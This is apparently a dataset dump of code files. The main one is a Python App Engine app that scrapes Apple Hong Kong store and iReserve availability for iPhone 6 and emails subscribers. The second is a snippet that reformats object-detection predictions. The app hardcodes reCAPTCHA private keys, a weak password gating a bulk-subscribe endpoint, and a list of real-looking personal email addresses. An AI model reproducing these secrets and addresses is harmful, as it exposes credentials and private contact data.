text
stringlengths 8
6.05M
|
|---|
# Web Server Gateway Interface (WSGI)
from google.appengine.api import users
import webapp2
import json
import logging
from datetime import datetime
import time
import datetime
from google.appengine.api import urlfetch
from google.appengine.ext import ndb
from urllib import urlencode
import re
from urllib2 import unquote
from google.appengine.api import mail
# Impersonate desktop Safari so Apple's store endpoints serve normal pages.
USER_AGENT = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/437.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/437.78.2"
# Referer headers expected by the online store and the iReserve CDN.
REFERRER_HK_ONLINE = "http://store.apple.com/hk/buy-iphone/iphone6"
REFERRER_HK_LOCAL = "https://reserve.cdn-apple.com/HK/en_HK/reserve/iPhone"
# Pseudo store id used for online-store rows in the Available records.
ONLINE_TAG = "Online"
# reCAPTCHA key pairs, one per mirror deployment.
# NOTE(review): private keys are committed to source control -- they should
# be rotated and loaded from configuration/secret storage instead.
PUBLIC_KEY_HKGOLDEN = "6LewtPoSAAAAAMTE4LeAjBa3JB7jUQRB_X422sIw"
PRIVATE_KEY_HKGOLDEN = "6LewtPoSAAAAAHTgjxbVMSjDk1XxKU4ut_DfWzH3"
PUBLIC_KEY_HKG = "6LedovoSAAAAAKFD_syd1EgMJrwGLC_GqOW8h7XV"
PRIVATE_KEY_HKG = "6LedovoSAAAAAHoFEfNTri-6L_NdPjbJC7zLgq2R"
PUBLIC_KEY_707 = "6LfTovoSAAAAAPAruvpcbAxuJgZ5SVYP9NW1mtgD"
PRIVATE_KEY_707 = "6LfTovoSAAAAAGhU4DkvAe-vNKHgA63RnZ9yhn0o"
# Active key pair for this deployment; the alternates belong to the mirrors.
# PUBLIC_KEY = PUBLIC_KEY_HKGOLDEN
# PRIVATE_KEY = PRIVATE_KEY_HKGOLDEN
# PUBLIC_KEY = PUBLIC_KEY_HKG
# PRIVATE_KEY = PRIVATE_KEY_HKG
PUBLIC_KEY = PUBLIC_KEY_707
PRIVATE_KEY = PRIVATE_KEY_707
# Availability is read live from Apple's CDN; the store list comes from a
# Dropbox snapshot (the live stores.json variant is kept commented out).
#STORE_JSON_HK = "https://reserve.cdn-apple.com/HK/en_HK/reserve/iPhone/stores.json"
AVAILABILITY_JSON_HK = "https://reserve.cdn-apple.com/HK/en_HK/reserve/iPhone/availability.json"
STORE_JSON_HK = "https://www.dropbox.com/s/3x227l09qo49gwp/stores_hk.json?dl=1"
#AVAILABILITY_JSON_HK = "https://www.dropbox.com/s/1hg8gfc7awrmlbi/AVAILABILITY_HK.json?dl=1"
# Disabled French-store equivalents.
#STORE_JSON_FR = https://reserve.cdn-apple.com/FR/fr/reserve/iPhone/stores.json
#AVAILABILITY_JSON_FR = "https://reserve.cdn-apple.com/FR/fr/reserve/iPhone/availability.json"
# STORE_JSON_FR = "https://www.dropbox.com/s/e057xohvb15dwve/stores_fr.json?dl=1"
# AVAILABILITY_JSON_FR = "https://www.dropbox.com/s/zzs8xq3g4ilg0rh/availability_fr.json?dl=1"
# Online-store "buy flow" URL fragments; a complete SKU URL is
# base + region + model path + screen size + colour + capacity + carrier.
URL_APPLE_STORE = "http://store.apple.com/"
URL_REGION = "hk"
URL_IPHONE6R = "/buyFlowSelectionSummary/IPHONE6?node=home/shop_iphone/family/iphone6&step=select"
URL_IPHONE6P = "/buyFlowSelectionSummary/IPHONE6P?node=home/shop_iphone/family/iphone6&step=select"
URL_SIZE_47 = "&option.dimensionScreensize=4_7inch"
URL_SIZE_55 = "&option.dimensionScreensize=5_5inch"
URL_COLOR_SILVER = "&option.dimensionColor=silver"
URL_COLOR_GOLD = "&option.dimensionColor=gold"
URL_COLOR_SPACE = "&option.dimensionColor=space_gray"
URL_16GB = "&option.dimensionCapacity=16gb"
URL_64GB = "&option.dimensionCapacity=64gb"
URL_128GB = "&option.dimensionCapacity=128gb"
URL_UNLOCKED = "&option.carrierModel=UNLOCKED%2FWW&carrierPolicyType=UNLOCKED"
# All 18 unlocked SKUs (2 models x 3 colours x 3 capacities), generated in
# the same order as the original hand-written list: 4.7" first, then 5.5",
# colours Silver/Gold/Space Grey, capacities 16/64/128 GB.
URLs_HK = [
    URL_APPLE_STORE + URL_REGION + model + size + color + capacity + URL_UNLOCKED
    for model, size in ((URL_IPHONE6R, URL_SIZE_47), (URL_IPHONE6P, URL_SIZE_55))
    for color in (URL_COLOR_SILVER, URL_COLOR_GOLD, URL_COLOR_SPACE)
    for capacity in (URL_16GB, URL_64GB, URL_128GB)
]
# Apple part numbers for every SKU, ordered 4.7" then 5.5", and within each
# size Silver/Gold/Space Grey, each at 16/64/128 GB.
MAPs = ["MG482ZP/A", "MG4H2ZP/A", "MG4C2ZP/A",  # 4.7 Silver
        "MG492ZP/A", "MG4J2ZP/A", "MG4E2ZP/A",  # 4.7 Gold
        "MG472ZP/A", "MG4F2ZP/A", "MG4A2ZP/A",  # 4.7 Space Grey
        "MGA92ZP/A", "MGAJ2ZP/A", "MGAE2ZP/A",  # 5.5 Silver
        "MGAA2ZP/A", "MGAK2ZP/A", "MGAF2ZP/A",  # 5.5 Gold
        "MGA82ZP/A", "MGAH2ZP/A", "MGAC2ZP/A"]  # 5.5 Space Grey

# Human-readable description per part number, derived from the ordering of
# MAPs above ("<Color> <Capacity>GB <Size>").
_descriptions = ["%s %sGB %s" % (_color, _capacity, _size)
                 for _size in ("4.7", "5.5")
                 for _color in ("Silver", "Gold", "Space Grey")
                 for _capacity in ("16", "64", "128")]
model_map = {}
for _part, _desc in zip(MAPs, _descriptions):
    model_map[_part] = _desc

# Store id -> display name; 'Online' is the pseudo-store for the web shop.
loc_map = {
    'R409': "Causeway Bay iReserve",
    'R428': "IFC Mall iReserve",
    'R485': "Festival Walk iReserve",
    'Online': "store.apple.com/hk",
}
class MailingList(ndb.Model):
    """Mailing-list subscriber; the entity key is the email address."""
    email = ndb.StringProperty()
    dateTimeCreated = ndb.DateTimeProperty(auto_now_add=True)
    active = ndb.BooleanProperty()  # True = subscribed, False = unsubscribed
    lastSent = ndb.DateTimeProperty(auto_now=True)  # refreshed on every put()

    def getAll(self):
        """Return every subscriber entity (active and inactive)."""
        return self.query().fetch()

    def getLastSent(self):
        """Return the last-broadcast timestamp tracked on the sentinel
        entity, or None when that entity does not exist.

        BUG FIX: the original dereferenced the entity unconditionally and
        raised AttributeError when the sentinel was missing.
        """
        obj = ndb.Key(MailingList, "3dmouse@gmail.com").get()
        if obj is None:
            return None
        return obj.lastSent

    def writeLastSent(self):
        """Touch the sentinel entity so auto_now refreshes its lastSent."""
        obj = ndb.Key(MailingList, "3dmouse@gmail.com").get()
        if obj is not None:  # BUG FIX: guard against a missing sentinel
            obj.put()

    def store(self, _email):
        """Register _email; return False if it is already actively subscribed
        (an inactive address is re-created, i.e. re-subscribed)."""
        if self.isExisting(_email):
            return False
        MailingList(key=ndb.Key(MailingList, _email),
                    email=_email,
                    active=True).put()
        return True

    def isExisting(self, _email):
        """True only when the address exists AND is not explicitly inactive."""
        obj = ndb.Key(MailingList, _email).get()
        return obj is not None and obj.active is not False

    def inactive(self, _email, _key):
        """Unsubscribe _email when _key matches its creation timestamp
        (the token handed out by issue()). Returns True on success."""
        obj = ndb.Key(MailingList, _email).get()
        if obj is None:  # BUG FIX: unknown address no longer crashes
            return False
        if obj.dateTimeCreated == _key:
            obj.active = False
            obj.put()
            return True
        return False

    def issue(self):
        """Token that authorises unsubscription (the creation time)."""
        return self.dateTimeCreated
# Product (key = partNumber)
class Product(ndb.Model):
    """One purchasable iPhone SKU; the entity key is the Apple part number."""
    partNumber = ndb.StringProperty()
    productName = ndb.StringProperty() # e.g. "iPhone 6 Plus"
    capacity = ndb.IntegerProperty()   # storage in GB
    size = ndb.FloatProperty()         # screen size: 4.7 or 5.5
    color = ndb.StringProperty()
    unlocked = ndb.BooleanProperty() # 1 Unlocked, 0 locked
    country = ndb.StringProperty()

    def get(self):
        # Return every Product entity.
        return self.query().fetch()

    def peek(self,_partNumber):
        # Return the Product with this part number, or None if unknown.
        return ndb.Key(Product, _partNumber).get()

    def store(self, _partNumber, _productName, _capacity, _color, _unlocked, _country):
        # Upsert a SKU keyed by part number; screen size is derived from the
        # product name.
        # NOTE(review): `find("Plus") > 0` misclassifies a name that STARTS
        # with "Plus" (find() == 0) -- fine for "iPhone 6 Plus"-style names.
        if _productName.find("Plus") > 0:
            _size = 5.5
        else:
            _size = 4.7
        obj = Product(key=ndb.Key(Product,_partNumber),
                      partNumber=_partNumber,
                      productName=_productName,
                      capacity=int(_capacity),
                      size=_size,
                      color=_color,
                      unlocked=_unlocked,
                      country=_country)
        obj.put()
# Location (key = storeId)
class Location(ndb.Model):
    """A physical Apple store (iReserve pickup location)."""
    storeId = ndb.StringProperty()
    storeName = ndb.StringProperty()
    isOpen = ndb.BooleanProperty()
    lastOpenDateTime = ndb.DateTimeProperty(auto_now=True)  # bumped on put()

    def get(self, _storeId):
        # Look the store up by its storeId property (not by entity key).
        return self.query(Location.storeId == _storeId).get()

    def updateOpen(self, _storeId):
        # Mark the store open; auto_now also refreshes lastOpenDateTime.
        # NOTE(review): crashes if the store id is unknown (get() -> None).
        obj = self.get(_storeId)
        obj.isOpen = True
        obj.put()

    def save(self, _storeId, _storeName):
        # Upsert keyed by store id.
        obj = Location(key=ndb.Key(Location, _storeId))
        obj.storeId = _storeId
        obj.storeName = _storeName
        obj.put()
# Product: iPhone6 Silver 16GB
# location:
# availability: "0" (Not Available) : "1" (Available) : "2" (Error)
# dateTimeUpdated: provided by Apple (may not be available)
# dateTimeCreated: Date and Time at
class Available(ndb.Model):
    """One availability observation for a (partNumber, storeId) pair.
    A new row is appended on every state change; the newest row is the
    current state."""
    partNumber = ndb.StringProperty()
    storeId = ndb.StringProperty()
    availability = ndb.IntegerProperty()  # 0 none, 1 in stock, 2 error, 3 unknown
    dateTimeCreated = ndb.DateTimeProperty(auto_now_add=True)

    def get_latest_availability(self, _partNumber, _storeId):
        """Return [availability, created, entity] for the newest record of
        the pair, or [3, None, None] when the pair has never been seen."""
        ret = self.query(Available.partNumber == _partNumber,
                         Available.storeId == _storeId).order(
                             -Available.dateTimeCreated).get()
        if ret is None:
            return [3, None, ret]
        return [ret.availability, ret.dateTimeCreated, ret]

    def get(self, _storeId):
        """All records for a store, newest first.

        BUG FIX: the original used `self.query(storeId=...)` and a string
        `.order('-dateTimeCreated')` -- that is the old `db` API; ndb takes
        filter expressions and property objects, so every call raised
        TypeError.
        """
        return self.query(Available.storeId == _storeId).order(
            -Available.dateTimeCreated).fetch()

    def getLast(self, _storeId):
        """Newest record for a store (same ndb-API fix as get())."""
        return self.query(Available.storeId == _storeId).order(
            -Available.dateTimeCreated).get()

    def save(self, _partNumber, _storeId, _availability):
        """Append a new observation row."""
        Available(partNumber=_partNumber,
                  storeId=_storeId,
                  availability=_availability).put()
class CrawlingHandler(webapp2.RequestHandler):
    """Cron entry point: polls Apple's online store and the iReserve feed,
    records availability transitions, and emails subscribers on openings."""
    # Class-level defaults; each request gets a fresh handler instance and
    # mutates its own copies via `self`.
    lastSent = None
    flag = False        # True once any SKU flipped to "available"
    email_content = ""  # accumulated notification body

    def online_store(self):
        """Poll every online-store SKU URL and persist state changes."""
        for _url in URLs_HK:
            result = urlfetch.fetch(_url, headers={'Referer': REFERRER_HK_ONLINE,
                                                   'User-Agent': USER_AGENT})
            if result.status_code != 200:
                # BUG FIX: the original concatenated the int status_code to a
                # str and raised TypeError; use lazy %-formatting instead.
                logging.error('Online Store is not working with status code %s',
                              result.status_code)
                continue
            content = json.loads(result.content)
            response_status = content["head"]["status"]  # "200" == Apple OK
            logging.info("Fetching ... " + _url)
            try:
                pageTitle = content["body"]["content"]["pageTitle"].decode('utf-8')
                # Country is the last parenthesised group of the page title.
                _country = pageTitle[pageTitle.rfind('(') + 1:pageTitle.rfind(')')]
                selected = content["body"]["content"]["selected"]
                _partNumber = selected["partNumber"].decode('utf-8')
                productTitle = selected["productTitle"].decode('utf-8').upper()
                shippingLead = selected["purchaseOptions"]["shippingLead"].decode('utf-8')
            except (ValueError, KeyError):
                logging.error("Receive empty json. " + _url)
                continue
            availability = shippingLead.find("Currently unavailable")
            # -1 -> plain iPhone 6, otherwise the Plus model.
            if productTitle.find("PLUS") < 0:
                _productName = "iPhone 6"
            else:
                _productName = "iPhone 6 Plus"
            # Capacity: first of 16/64/128 found in the upper-cased title.
            gbIndex = ""
            offset = 2
            for gb in ("16", "64", "128"):
                gbIndex = productTitle.find(gb)
                offset = 3 if gb == "128" else 2
                if gbIndex > 0:
                    break
            _capacity = productTitle[gbIndex:gbIndex + offset].strip()
            # Colour, by first matching keyword.
            if productTitle.find("GREY") > 0:
                _color = "Space Grey"
            elif productTitle.find("SILVER") > 0:
                _color = "Silver"
            elif productTitle.find("GOLD") > 0:
                _color = "Gold"
            else:
                _color = "Unknown Color"
            # Carrier policy.
            _unlocked = productTitle.find("UNLOCKED") > 0
            if response_status == "200":
                _availability = 0 if availability > 0 else 1
            else:
                _availability = 2  # error reported by the Apple store
            availabilityObject = Available()
            # Only persist when the state actually changed.
            latest = availabilityObject.get_latest_availability(_partNumber, ONLINE_TAG)
            if latest[1] is None:
                # First sighting of this part number: create the Product too.
                Product().store(_partNumber, _productName, _capacity, _color,
                                _unlocked, _country)
                availabilityObject.save(_partNumber, ONLINE_TAG, _availability)
            elif latest[0] != _availability:
                availabilityObject.save(_partNumber, ONLINE_TAG, _availability)
                if _availability == 1:
                    self.email_content += "[Online] :" + str(_partNumber) + " now available. \n"
                    self.flag = True
            logging.info('Online Store successfully fetched data')

    def local_store(self):
        """Poll the iReserve availability feed and persist state changes."""
        result = urlfetch.fetch(AVAILABILITY_JSON_HK,
                                headers={'Referer': REFERRER_HK_LOCAL,
                                         'User-Agent': USER_AGENT})
        if result.status_code != 200:
            # BUG FIX: original did str + int concatenation (TypeError).
            logging.error("Local Store Apple Server return an error %s",
                          result.status_code)
            return
        content = json.loads(result.content)
        logging.info("local Store is reading ...." + result.content)
        if len(content) == 0:
            # Empty payload == iReserve just closed. If a store was seen
            # open within the last 5 minutes, zero out everything.
            lastSeen = Location().get("R409").lastOpenDateTime
            # BUG FIX: use total_seconds(); timedelta.seconds ignores whole
            # days, so a long gap could look "recent" again.
            if lastSeen is not None and \
                    (datetime.datetime.now() - lastSeen).total_seconds() < 300:
                # NOTE(review): invoking another handler directly is hacky
                # but matches the original design.
                QuickFixHandler().get()
            return
        # iReserve is open: walk store -> partNumber -> truthy availability.
        for _storeId in content:
            if _storeId == "updated":  # feed metadata, not a store
                continue
            for _partNumber in content[_storeId]:
                _availability = 1 if content[_storeId][_partNumber] else 0
                availabilityObject = Available()
                latest = availabilityObject.get_latest_availability(_partNumber, _storeId)
                if latest[1] is None:
                    logging.critical("local new product " + str(_partNumber) +
                                     " at " + str(_storeId))
                elif latest[0] != _availability:
                    availabilityObject.save(_partNumber, _storeId, _availability)
                    if _availability == 1:
                        self.email_content += "[ON] " + str(model_map[_partNumber]) + \
                            ": at " + str(loc_map[_storeId]) + " \n"
                        self.flag = True
                # NOTE(review): raises KeyError if the feed ever contains a
                # part number / store id missing from the module maps.
                logging.info("Successfully fetched - " + model_map[_partNumber] +
                             " in local store at " + loc_map[_storeId])

    def emailDistribute(self, _string):
        """Broadcast _string to every subscriber, rate-limited to one mail
        batch per 5 minutes (tracked on the MailingList sentinel entity)."""
        lastSentTime = MailingList().getLastSent()
        lastSentDelta = None
        if lastSentTime is not None:
            # BUG FIX: total_seconds() -- .seconds ignores whole days, which
            # could suppress mail forever once the gap exceeded a day.
            lastSentDelta = (datetime.datetime.now() - lastSentTime).total_seconds()
        if self.lastSent is None and (lastSentTime is None or lastSentDelta > 300):
            obj = MailingList()
            for customer in obj.getAll():
                _email = customer.email
                sender_address = "iPhone6 開賣 Alert <naivedevelopers@gmail.com>"
                subject = "[有貨] iPhone6 開賣 Alert 有Update."
                body = """
直入Login: https://reserve-hk.apple.com/HK/zh_HK/reserve/iPhone
Check邊度有貨: https://reserve.cdn-apple.com/HK/en_HK/reserve/iPhone/availability
"""
                body += _string
                logging.critical("[" + str(datetime.datetime.now()) +
                                 "]email writing to " + str(_email))
                mail.send_mail(sender_address, _email, subject, body)
            obj.writeLastSent()
        else:
            # Mark this handler instance as having attempted a send.
            self.lastSent = "THINGS"

    def get(self):
        """Cron handler: crawl both channels, then notify if anything opened."""
        logging.info('CrawlingHandler: Starting Fetch data')
        self.online_store()
        self.local_store()
        if self.flag is True:
            self.emailDistribute(self.email_content)
class DisplayStatusHandler (webapp2.RequestHandler):
    """Render an HTML table of the latest availability per product/store."""

    def getJson(self):
        # Build {partNumber: {storeId: [availability, created]}} from the
        # most recent Available record of every (product, store) pair.
        product_object = Product()
        result_product = product_object.query().fetch()
        dict_json_1 = {}
        for product in result_product:
            _partNumber = product.partNumber
            # NOTE(review): the Location query is re-run for every product;
            # it could be hoisted out of the loop.
            location_object = Location()
            result_location = location_object.query().fetch()
            _available_object = Available()
            _availability = _available_object.get_latest_availability(_partNumber,ONLINE_TAG)
            dict_json_2 = {}
            dict_json_2[ONLINE_TAG] = [_availability[0], _availability[1]]
            for location in result_location:
                _storeId = location.storeId
                _storeName = location.storeName
                _available_object = Available()
                _availability = _available_object.get_latest_availability(_partNumber,_storeId)
                dict_json_2[_storeId] = [_availability[0], _availability[1]]
            dict_json_1[_partNumber] = dict_json_2
        return dict_json_1

    def interpret(self,_available, _datetime):
        # NOTE(review): appears unused by get(); under Python 2 the
        # latin1 encode of the non-latin1 characters below would raise
        # UnicodeEncodeError -- verify before relying on this helper.
        if _datetime is None:
            return "Unavailable"
        if _available == 0 or _available == 3:
            # +8h shifts the stored naive timestamp to Hong Kong time
            # (assumes timestamps are naive UTC -- TODO confirm).
            return "Unavailable ("+ u'最近一次開售'.encode('utf8') +str(datetime.timedelta(hours=+8) + _datetime)+")"
        return unquote(u"有得買 NOW".encode("latin1")).decode("utf8")

    def interpretAvailable(self,_available):
        # 0 = no stock, 3 = never observed -> both shown as unavailable.
        if _available == 0 or _available == 3:
            return "Unavailable "
        return "Available NOW "

    def interpretDateTime(self,_datetime):
        if _datetime is None:
            return "Unavailable"
        # Naive timestamp + 8h == Hong Kong local time (see interpret()).
        return "( Last Release : "+str(datetime.timedelta(hours=+8) + _datetime)+")"

    def get(self):
        # NOTE: this local deliberately shadows the json module (harmless
        # inside this method, which never calls the module).
        json = self.getJson()
        ret = "<table>"
        for partNumber in json:
            # One <tr> fragment per SKU, repeated for every location row.
            head = "<tr> <th id=\""+str(partNumber)+"\">"+model_map[partNumber]+"</th>"
            for loc in json[partNumber]:
                ret += head
                ret += "<th class=\""+str(partNumber)+str(loc)+"\">"+loc_map[loc]+"</th>"
                ret += "<th>"+self.interpretAvailable(json[partNumber][loc][0])+"</th>"
                ret += "<th>"+self.interpretDateTime(json[partNumber][loc][1])+"</th></tr>"
        ret += "</table>"
        self.response.headers['Content-type'] = 'text/html'
        self.response.write("<!DOCTYPE html><html>" \
        "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" />\
<head><title> iPhone 6 Apple.com Status </title><body>"+ret +"</body></html>")
class GetStatusHandler(webapp2.RequestHandler):
    """Dump the latest availability of every product/store pair as JSON.
    Keys are wrapped in literal double quotes, matching the original
    output format."""

    def get(self): # Loop through Product and get its key
        summary = {}
        for product in Product().query().fetch():
            part_number = product.partNumber
            per_location = {}
            per_location['"' + ONLINE_TAG + '"'] = str(
                Available().get_latest_availability(part_number, ONLINE_TAG))
            # Location query intentionally kept inside the loop to match the
            # original's datastore access pattern.
            for location in Location().query().fetch():
                per_location['"' + location.storeId + '"'] = str(
                    Available().get_latest_availability(part_number, location.storeId))
            summary['"' + part_number + '"'] = per_location
        self.response.headers['Content-type'] = 'application/json'
        self.response.write(json.dumps(summary))
class LandingHandler(webapp2.RequestHandler):
    """Serve the signup landing page: mirror links, the email form, and the
    reCAPTCHA widget (with a noscript fallback)."""

    def paragraph(self,_str):
        # Wrap text in a <p> element. NOTE(review): unused by get().
        return "<p>"+_str+"</p>"

    def get(self): # Get Request
        self.response.headers['Content-type'] = 'text/html'
        # One continuation-joined HTML literal; the form POSTs to /getEmail
        # and embeds PUBLIC_KEY into both reCAPTCHA URLs.
        self.response.write("<!DOCTYPE html><html>" \
        "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" />\
<head><title> iPhone 6 Apple.com Tracker </title><body> \
<h1>登記 iPhone6 喺 Apple Store開售 同 iReserve預約 嘅 Mailing List </h1>\
<p> <a href=\"http://iphone6-hkg.appspot.com/stat\">iphone6-hkg.appspot.com/stat</a>: 0759 - 0847 every 1 minute<br> \
<p> <a href=\"http://iphone6-707.appspot.com/stat\">iphone6-707.appspot.com/stat</a>: 0847 - 2000 every 1 minute<br>\
<p> <a href=\"http://iphone6-hkgolden.appspot.com/stat\">iphone6-hkgolden.appspot.com/stat</a> 2001 - 0758 every 2 minutes </p> \
<form method=\"POST\" action=\"/getEmail\"><input type=\"email\" name=\"email\" id=\"email\"\
placeholder=\"Email Address\" />\
<input type=\"submit\" value=\"Sign Up\" /> \
<script type=\"text/javascript\" \
src=\"http://www.google.com/recaptcha/api/challenge?k="+PUBLIC_KEY+"\"> \
</script><noscript> \
<iframe src=\"http://www.google.com/recaptcha/api/noscript?k="+PUBLIC_KEY+"\" \
height=\"300\" width=\"500\" frameborder=\"0\"></iframe><br> \
<textarea name=\"recaptcha_challenge_field\" rows=\"3\" cols=\"40\"></textarea> \
<input type=\"hidden\" name=\"recaptcha_response_field\" value=\"manual_challenge\"> </noscript></form> \
<p> Created By 高登高仔 @ HKGolden.com </p>\
</body></html>")
#<iframe src=\"/display\" style=\"border: 0; position: absolute; left:0; right:0; width:100%; height:100%\"\">
class StorePushHandler(webapp2.RequestHandler):
    """Import the store-list JSON snapshot and upsert one Location per store."""

    def get(self):
        logging.info('Fetch data from STORE_JSON_HK')
        response = urlfetch.fetch(STORE_JSON_HK)
        payload = json.loads(response.content)
        for store in payload["stores"]:
            Location().save(store["storeNumber"], store["storeName"])
class SuccessRegistrationHandler(webapp2.RequestHandler):
    """Static confirmation page shown after a successful signup."""

    def get(self):
        self.response.write("<html><meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" />\
<body><h1>搞掂咗。你會收到一封Email架。<p> You will receive a confirmation email containing \
information how to unsubscribe</p></body></html>")
class FailedRegistrationHandler(webapp2.RequestHandler):
    """Static error page (wrong captcha or duplicate email); meta-refreshes
    back to the landing page after 3 seconds."""

    def get(self):
        self.response.write("<html><head><meta http-equiv=\"refresh\" content=\"3;url=/\" /> \
<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" /></head><body>\
<h1> 可能一) 錯Captcha呀。你係小學雞。啲字母都搞唔清。再嚟過啦。 </h1> \
<h1> 可能二) 你咪入過囉. 做乜搞多次. </h1> \
<p>Redirecting in 3 seconds... or <a href=\"/\" >Click here to the landing page. \
</a></p></body></html>")
class ObtainEmailHandler(webapp2.RequestHandler):
    """Mailing-list signup endpoint.

    GET: password-gated bulk import of a hard-coded address list.
    POST: verify the reCAPTCHA answer and register a single address.
    """

    def validate(self, _email):
        # Loose shape check: something@something.something
        return re.match(r'[^@]+@[^@]+\.[^@]+', _email)

    def _sendWelcome(self, _email):
        # Shared welcome mail (was duplicated between get() and post()).
        sender_address = "iPhone6 開賣 Alert <naivedevelopers@gmail.com>"
        subject = "多謝登記 iPhone6 開賣 Alert 服務"
        body = """
最終入口: http://iphone6-hkgolden.appspot.com/
Backup1: http://iphone6-hkg.appspot.com/
Backup2: http://iphone6-707.appspot.com/
直入Login: https://reserve-hk.apple.com/HK/zh_HK/reserve/iPhone
Check邊度有貨: https://reserve.cdn-apple.com/HK/en_HK/reserve/iPhone/availability
"""
        mail.send_mail(sender_address, _email, subject, body)

    def get(self):
        # NOTE(review): personal addresses (with duplicates) are committed
        # in source -- they belong in the datastore or a config file.
        password = self.request.get("password")
        if password == "dying":
            # Renamed from `list`, which shadowed the builtin.
            emails = ["beauty235@gmail.com","bennylai@cen-1.com","cheukhinli@yahoo.com.hk","danielckn89@gmail.com",
                      "jonathanyth@gmail.com","michaelwong1231@gmail.com","oscarlai2383@gmail.com","s6f318484@hotmail.com",
                      "sailokto@yahoo.com.hk",
                      "wuwuyan1214@yahoo.com.hk",
                      "U3503819@GMAIL.COM",
                      "awdhoward@gmail.com",
                      "jonathanyth@gmail.com",
                      "laihiube@gmail.com",
                      "sailokto@yahoo.com.hk",
                      "wuwuyan1214@yahoo.com.hk",
                      "andrew030608@yahoo.com.hk",
                      "chanhok@live.hk",
                      "jonathanyth@gmail.com",
                      "kc343000@gmail.com",
                      "lcklrt1004@gmail.com",
                      "ryantck@gmail.com",
                      "sailokto@yahoo.com.hk",
                      "wuwuyan1214@yahoo.com.hk"]
            obj = MailingList()
            for _email in emails:
                if mail.is_email_valid(_email):
                    if obj.store(_email) is True:
                        self._sendWelcome(_email)
                        logging.info("Welcome letter sent to "+_email)
            self.redirect("/success")
        else:
            self.redirect("/failure#1")

    def post(self):
        VERIFY_URL = "http://www.google.com/recaptcha/api/verify"
        data = {
            "privatekey": PRIVATE_KEY,
            "remoteip": self.request.remote_addr,
            "challenge": self.request.get("recaptcha_challenge_field"),
            "response": self.request.get("recaptcha_response_field")}
        response = urlfetch.fetch(url=VERIFY_URL,
                                  payload=urlencode(data),
                                  method="POST")
        # First line of the verify response body is "true" or "false".
        captcha_ok = response.content.split("\n")[0] == "true"
        if not captcha_ok:
            self.redirect("/failure#1")
            return
        _email = self.request.get("email")
        obj = MailingList()
        if not mail.is_email_valid(_email):
            self.redirect("/failure#2")
            return
        if obj.store(_email) is True:
            self._sendWelcome(_email)
            self.redirect("/success")
        else:
            # Already actively subscribed.
            self.redirect("/failure#3")
# Mutate the availability value from 1 to 0
class QuickFixHandler(webapp2.RequestHandler):
    """Force the latest record of every (part, store) pair back to
    'unavailable' -- used when the iReserve feed goes empty (store closed)."""

    def get(self):
        for product in Product().get():
            _partNumber = product.partNumber
            available_obj = Available()
            for _storeId in loc_map:
                status, _created, record = available_obj.get_latest_availability(
                    _partNumber, _storeId)
                # BUG FIX: when the pair has never been recorded the helper
                # returns [3, None, None] and the original crashed on
                # None.availability -- skip missing records.
                if record is not None and status != 0:
                    record.availability = 0
                    record.put()
# One WSGIApplication per route; app.yaml maps each URL pattern to the
# matching module-level app object. debug=True shows tracebacks in responses.
getEmailApp = webapp2.WSGIApplication([
    ('/getEmail', ObtainEmailHandler)
], debug=True)
landingApp = webapp2.WSGIApplication([
    ('/', LandingHandler)
], debug=True)
# getStatusApp = webapp2.WSGIApplication([
# ('/status', GetStatusHandler)
# ], debug=True)
pushStoreApp = webapp2.WSGIApplication([
    ('/push', StorePushHandler)
], debug=True)
crawlApp = webapp2.WSGIApplication([
    ('/crawl', CrawlingHandler)
], debug=True)
successRegistrationApp = webapp2.WSGIApplication([
    ('/success', SuccessRegistrationHandler)
], debug=True)
failedRegistrationApp = webapp2.WSGIApplication([
    ('/failure', FailedRegistrationHandler)
], debug=True)
displayStatusApp = webapp2.WSGIApplication([
    ('/stat', DisplayStatusHandler)
], debug=True)
quickFixApp = webapp2.WSGIApplication([
    ('/fix', QuickFixHandler)
], debug=True)
|
import os
import glob
import numpy as np
import argparse
import pandas as pd
from tqdm import tqdm
from ensemble_boxes import *
def string_to_row(df, fold_num):
    """Explode a submission-format DataFrame into one row per predicted box.

    Args:
        df: DataFrame with 'image_id' and 'PredictionString' columns, where
            each prediction string is a flat sequence of
            "class conf x_min y_min x_max y_max" sextets.
        fold_num: identifier stored in the 'model' column of every row.

    Returns:
        DataFrame with columns image_id, model, class, confidence,
        x_min, y_min, x_max, y_max.
    """
    # 'model' is a scalar and broadcasts over all rows; the original
    # re-assigned it on every loop iteration (and also kept a dead
    # `img_id = class_ = ... = []` aliasing line, removed here). The
    # df.copy() was dropped too -- iteration is read-only.
    data = {'image_id': [], 'model': fold_num, 'class': [], 'confidence': [],
            'x_min': [], 'y_min': [], 'x_max': [], 'y_max': []}
    for _, row in tqdm(df.iterrows(), total=len(df)):
        pred = row['PredictionString'].split(' ')
        # Each box occupies 6 whitespace-separated fields.
        for ptr in range(0, len(pred) - 5, 6):
            data['image_id'].append(row['image_id'])
            data['class'].append(int(pred[ptr]))
            data['confidence'].append(float(pred[ptr + 1]))
            # NOTE(review): coordinates are parsed with int(); a CSV with
            # float coordinates (e.g. "100.0") would raise ValueError.
            data['x_min'].append(int(pred[ptr + 2]))
            data['y_min'].append(int(pred[ptr + 3]))
            data['x_max'].append(int(pred[ptr + 4]))
            data['y_max'].append(int(pred[ptr + 5]))
    return pd.DataFrame(data, columns=list(data.keys()))
def row_to_string(df):
    """Collapse per-box rows back into submission format: one
    PredictionString per image_id.

    Assumes all rows of an image are contiguous (grouped by image_id);
    interleaved image ids would produce duplicate output rows.
    """
    # Robustness fix: the original crashed on iloc[0] for an empty frame.
    if len(df) == 0:
        return pd.DataFrame({'image_id': [], 'PredictionString': []})
    data = {'image_id': [], 'PredictionString': []}
    current = df.iloc[0]['image_id']
    string = ""
    for _, row in tqdm(df.iterrows(), total=len(df)):
        # BUG FIX: the two branches formatted confidence differently
        # (plain repr vs ':.2f'), so the output depended on a box's
        # position within its group; one shared format is used now.
        box = f"{row['class']} {row.confidence} {row.x_min} {row.y_min} {row.x_max} {row.y_max} "
        if row.image_id == current:
            string += box
        else:
            # Flush the finished image group and start the next one.
            data['image_id'].append(current)
            data['PredictionString'].append(string)
            string = box
            current = row.image_id
    # Flush the final group.
    data['image_id'].append(current)
    data['PredictionString'].append(string)
    return pd.DataFrame(data, columns=list(data.keys()))
# Weighted Box Fusion
